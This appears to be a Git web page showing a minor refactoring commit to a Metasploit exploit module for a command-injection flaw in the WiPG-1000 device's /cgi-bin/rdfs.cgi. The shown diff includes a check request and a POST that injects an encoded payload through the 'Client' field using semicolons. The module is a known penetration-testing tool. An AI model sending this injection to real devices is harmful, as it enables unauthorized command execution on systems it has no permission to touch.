infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Make minor changes

bug/bundler_fix
Matthias Brun 2017-04-24 23:35:36 +02:00
parent 35bc1fbf28
commit d3aba846b9
1 changed files with 5 additions and 7 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

12
modules/exploits/linux/http/wipg1000_cmd_injection.rb
View File

@ -3,8 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
@ -50,12 +48,12 @@ class MetasploitModule < Msf::Exploit::Remote
def check
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri('/cgi-bin/rdfs.cgi')
'uri' => '/cgi-bin/rdfs.cgi'
})
if res and res.body =~ /Follow administrator instructions to enter the complete path/ then
return Exploit::CheckCode::Appears
if res && res.body.include?("Follow administrator instructions to enter the complete path")
Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Safe
Exploit::CheckCode::Safe
end
end
@ -63,7 +61,7 @@ class MetasploitModule < Msf::Exploit::Remote
print_status('Sending request')
send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri('/cgi-bin/rdfs.cgi'),
'uri' => '/cgi-bin/rdfs.cgi',
'vars_post' => {
'Client' => ";#{payload.encoded};",
'Download' => 'Download'